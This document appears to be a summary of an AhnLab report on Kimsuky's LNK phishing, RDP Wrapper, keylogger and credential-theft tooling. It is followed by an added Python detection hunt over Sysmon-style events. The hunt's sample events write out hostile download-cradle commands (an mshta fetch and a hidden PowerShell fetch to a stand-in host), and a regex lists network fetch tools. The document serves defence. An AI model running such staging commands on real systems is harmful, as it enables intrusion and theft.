Persistent Threats from the Kimsuky Group Using RDP Wrapper

2025-02-04 Ahnlab

https://asec.ahnlab.com/en/86098/

ASEC reports that Kimsuky continues to deliver malicious LNK files through spear-phishing, with filenames tailored to specific people or companies. The LNK files run PowerShell or Mshta to fetch further payloads, and the final remote-control tools include PebbleDash and a customized RDP Wrapper that enables remote desktop access to infected systems. The report also describes proxy malware used to reach infected hosts on private networks, keyloggers that write captured input to paths such as C:\Programdata\joeLog.txt and C:\Programdata\jLog.txt, and forceCopy tooling that uses an NTFS Parser library to copy browser configuration files even while they are in use. Recent samples also include Loader, Injector, and ReflectiveLoader components, showing a shift toward RDP Wrapper, proxy access, and credential theft rather than relying only on conventional backdoor deployment.
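As an added example (editor's code, not from the ASEC report or this page), the following Python hunt applies two of the indicators above to constructed Sysmon-style telemetry: a PowerShell or Mshta process spawned by Explorer with a download cradle on its command line, which is how a double-clicked LNK stager typically surfaces in process-creation events (the Explorer-parent and fetch-keyword heuristics are this example's assumptions, not the report's), and file creation at the two keylogger output paths the report names. Field names follow Sysmon's event schema (Image, ParentImage, CommandLine, TargetFilename); the sample events are constructed, not captured.

```python
# Hunt Sysmon-style events for two Kimsuky indicators described in the
# summary: LNK-launched PowerShell/Mshta download cradles and writes to the
# keylogger logs C:\Programdata\joeLog.txt and C:\Programdata\jLog.txt.
# Example code added by the editor; the parent-process and fetch-keyword
# heuristics are assumptions, and all sample events are constructed.
from __future__ import annotations

import re
from pathlib import PureWindowsPath

# Keylogger output files named in the report (compared case-insensitively).
KEYLOG_PATHS = {
    r"c:\programdata\joelog.txt",
    r"c:\programdata\jlog.txt",
}

# LOLBins the report says the LNK files use to fetch the next stage.
LNK_STAGERS = {"powershell.exe", "mshta.exe"}

# Command-line fragments suggesting a remote fetch (heuristic assumption).
FETCH_RE = re.compile(
    r"https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|\bcurl\b|\bwget\b|new-object\s+net\.webclient",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def match_lnk_stager(event: dict) -> bool:
    """Sysmon EventID 1 (process create) where Explorer (the parent of a
    double-clicked LNK; an assumption of this example) spawns PowerShell or
    Mshta with a command line that pulls something from the network."""
    if event.get("EventID") != 1:
        return False
    child = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    return (
        child in LNK_STAGERS
        and parent == "explorer.exe"
        and FETCH_RE.search(cmdline) is not None
    )


def match_keylog_path(event: dict) -> bool:
    """Sysmon EventID 11 (file create) targeting one of the keylogger logs."""
    if event.get("EventID") != 11:
        return False
    return event.get("TargetFilename", "").lower() in KEYLOG_PATHS


def hunt(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every event matching a rule."""
    hits: list[tuple[int, str]] = []
    for i, ev in enumerate(events):
        if match_lnk_stager(ev):
            hits.append((i, "lnk_stager"))
        if match_keylog_path(ev):
            hits.append((i, "keylogger_output"))
    return hits


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {  # benign: PowerShell started from a console, no remote fetch
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
    {  # suspicious: Explorer -> mshta pulling a remote HTA, as a LNK would
        "EventID": 1,
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta.exe http://example.invalid/stage.hta",
    },
    {  # suspicious: Explorer -> hidden PowerShell download cradle
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/p -OutFile $env:TEMP\\p.dat"',
    },
    {  # keylogger output path; mixed case shows the compare is case-insensitive
        "EventID": 11,
        "TargetFilename": r"C:\ProgramData\joeLog.txt",
    },
    {  # benign file create under ProgramData
        "EventID": 11,
        "TargetFilename": r"C:\ProgramData\App\settings.json",
    },
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Running the module flags events 1 and 2 as LNK stagers and event 3 as a keylogger write, while the console-launched PowerShell and the ordinary ProgramData write pass. In production the same two rules map directly onto a SIEM query over Sysmon EventID 1 and 11, and the file-path rule should be extended to any additional log names observed in your own samples.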
